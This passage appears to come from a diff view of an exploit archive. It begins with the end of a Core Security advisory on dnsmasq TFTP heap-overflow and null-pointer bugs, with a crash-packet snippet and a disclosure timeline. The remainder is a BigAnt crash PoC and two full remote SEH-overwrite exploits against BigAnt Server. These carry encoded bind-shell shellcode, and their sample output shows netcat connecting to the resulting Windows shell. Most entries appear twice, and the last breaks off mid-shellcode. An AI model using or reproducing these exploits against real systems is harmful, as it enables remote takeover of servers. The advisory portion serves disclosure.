First let's focus on the overflow vulnerability. The 'tftp_request'
calls 'strncat' on 'daemon->namebuff', which has a predefined size of
'MAXDNAME' bytes (defaulting to 1025).
/-----------
else if (filename[0] == '/')
daemon->namebuff[0] = 0;
strncat(daemon->namebuff, filename, MAXDNAME);
- -----------/
This may cause a heap overflow because 'daemon->namebuff' may already
contain data, namely the configured 'daemon->tftp_prefix' passed to the
daemon via a configuration file.
/-----------
if (daemon->tftp_prefix)
{
if (daemon->tftp_prefix[0] == '/')
daemon->namebuff[0] = 0;
strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME)
- -----------/
The default prefix is '/var/tftpd', but if a longer prefix is used,
arbitrary code execution may be possible.
Sending the string resulting from the execution of the following python
snippet to a vulnerable server, with a long enough directory prefix
configured, should crash the daemon.
/-----------
import sys
sys.stdout.write( '\x00\x01' + "A"*1535 + '\x00' + "netascii" + '\x00' )
- -----------/
8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*
Now onto the null-pointer dereference. The user can crash the service by
handcrafting a packet, because of a problem on the guard of the first if
inside this code loop:
/-----------
while ((opt = next(&p, end)))
{
if (strcasecmp(opt, "blksize") == 0 &&
(opt = next(&p, end)) &&
!(daemon->options & OPT_TFTP_NOBLOCK))
{
transfer->blocksize = atoi(opt);
if (transfer->blocksize < 1)
transfer->blocksize = 1;
if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4)
transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4;
transfer->opt_blocksize = 1;
transfer->block = 0;
}
if (strcasecmp(opt, "tsize") == 0 && next(&p, end) &&
!transfer->netascii)
{
transfer->opt_transize = 1;
transfer->block = 0;
}
}
- -----------/
The problem exists because the guard of the first if includes the result
of 'opt = next(&p, end)' as part of the check. If this returns 'NULL',
the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will
derrefence the null-pointer.
9. *Report Timeline*
. 2009-08-20:
Core Security Technologies notifies Simon Kelley of the vulnerability,
including technical details of the vulnerability in an advisory draft.
. 2009-08-21:
Simon Kelley acknowledges the vulnerability and confirms to be working
on a patch. He also informs that he is aware that most home router
distributions have tftp turned off by default, and firewalled, and
suggests this should be mentioned on the advisory. Simon also mentions
that a NULL-pointer dereference bug has also been discovered on that
code, and suggests merging both bugs in the same advisory. Monday 31/08
is accepted as a possible release date for this advisory, and help is
offered in contacting package maintainers of dnsmasq for most operating
systems.
. 2009-08-21:
Core changes the advisory draft to accommodate Simon's suggestions.
About the NULL-pointer dereference, Core mentions the terms it thinks
appropriate for the bug to be merged into this advisory, and details how
this would affect the following procedures, such as asking for a
CVE/Bugtraq ID.
. 2009-08-23:
Simon Kelley contacts Core back, saying that the terms for the
null-pointer derrefence bug to be included in the advisory are ok. He
also mentions that the finder of this bug prefers to remain uncredited
in this advisory. Details are sent by him about the new bug so that the
advisory draft can be updated to include it.
. 2009-08-23:
Core asks for proper CVE and Bugtraq ID numbers, specifying it believes
each vulnerability reported in this advisory should be assigned its own.
. 2009-08-23:
Vincent Danen, from Red Hat's Security Response Team contacts Core in
order to discuss both vulnerabilities by a secure communications
channel, and offers its help in obtaining proper CVE numbers, specifying
they also believe a separate number should be assigned to each
vulnerability.
. 2009-08-23:
Core replies to Vincent Danen by sending its gpg key. Core also mentions
separate CVE numbers have already been asked.
. 2009-08-23:
Core replies to Simon Kelley, including a new advisory draft with both
bugs merged.
. 2009-08-23:
Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends
them to Red Hat and Simon Kelley.
. 2009-08-31:
The advisory CORE-2009-0820 is published.
10. *References*
[1] http://www.thekelleys.org.uk/dnsmasq/doc.html
[2] http://www.isi.edu/in-notes/ien/ien133.txt
[3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol
11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.
12. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm
wa3syAdyXlixVdQhdk5vcK0=
=tfqM
-----END PGP SIGNATURE-----
# milw0rm.com [2009-09-09]

View file

@ -1,18 +1,18 @@
#!/usr/bin/env python
#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
# milw0rm.com [2009-09-16]
#!/usr/bin/env python
#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
# milw0rm.com [2009-09-16]

View file

@ -1,122 +1,122 @@
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 192.168.1.195:6080
# bt ~ # nc -vv 192.168.1.195 4444
# 192.168.1.195: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#
###############################################################################
from socket import *
from optparse import OptionParser
import sys
print "[*********************************************************************]"
print "[* *]"
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
print "[* Discovered and Coded By *]"
print "[* Matteo Memelli *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
if not (HOST and PORT):
parser.print_help()
sys.exit()
# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
shellcode = (
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
)
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
'C'*1225
print '[+] Connecting to host...'
s = socket(AF_INET, SOCK_STREAM)
# s.connect(('192.168.1.195', 6080))
s.connect((HOST, PORT))
print '[+] Overflowing the buffer...'
s.send('GET ' + evilbuf + "\n\n")
s.close()
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
# milw0rm.com [2008-04-15]
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
# muts you gave me the wrong pill! it's your fault!!!
# I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 192.168.1.195:6080
# bt ~ # nc -vv 192.168.1.195 4444
# 192.168.1.195: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#
###############################################################################
from socket import *
from optparse import OptionParser
import sys
print "[*********************************************************************]"
print "[* *]"
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
print "[* Discovered and Coded By *]"
print "[* Matteo Memelli *]"
print "[* (ryujin) *]"
print "[* www.be4mind.com - www.gray-world.net *]"
print "[* *]"
print "[*********************************************************************]"
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
action="store", dest="HOST",
help="Target Host")
parser.add_option("-P", "--target_port", type="int",
action="store", dest="PORT",
help="Target Port")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
if not (HOST and PORT):
parser.print_help()
sys.exit()
# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
shellcode = (
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
)
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
'C'*1225
print '[+] Connecting to host...'
s = socket(AF_INET, SOCK_STREAM)
# s.connect(('192.168.1.195', 6080))
s.connect((HOST, PORT))
print '[+] Overflowing the buffer...'
s.send('GET ' + evilbuf + "\n\n")
s.close()
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
# milw0rm.com [2008-04-15]

View file

@ -1,106 +1,106 @@
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")
payload = "\x41" * 985 # seh overwritten at 989
next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
nops = "\x90" * 10 # nop sled
sc = shellcode # 710 bytes available for shellcode
print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
print "[*] Written and discovered by Blake"
print "[*] Tested on Windows XP SP3\n"
print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)
print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
s.close()
print "[+] Connect to bind shell on port 4444\n"
# milw0rm.com [2009-09-15]
#!/usr/bin/python
# BigAnt Server version 2.50 SEH Overwrite - 0day
# Written and discovered by Blake
# Tested on Windows XP SP3
#
# $ ./bigant.py 192.168.1.131 6660
#
# [*] BigAnt Server v2.50 SEH Overwrite 0day
# [*] Written and discovered by Blake
# [*] Tested on Windows XP SP3
#
# [+] Connecting to 192.168.1.131 on port 6660
# [+] Sending payload
# [+] Connect to bind shell on port 4444
#
# $ nc 192.168.1.131 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\WINDOWS\system32>
import socket, sys
if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
shellcode = (
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
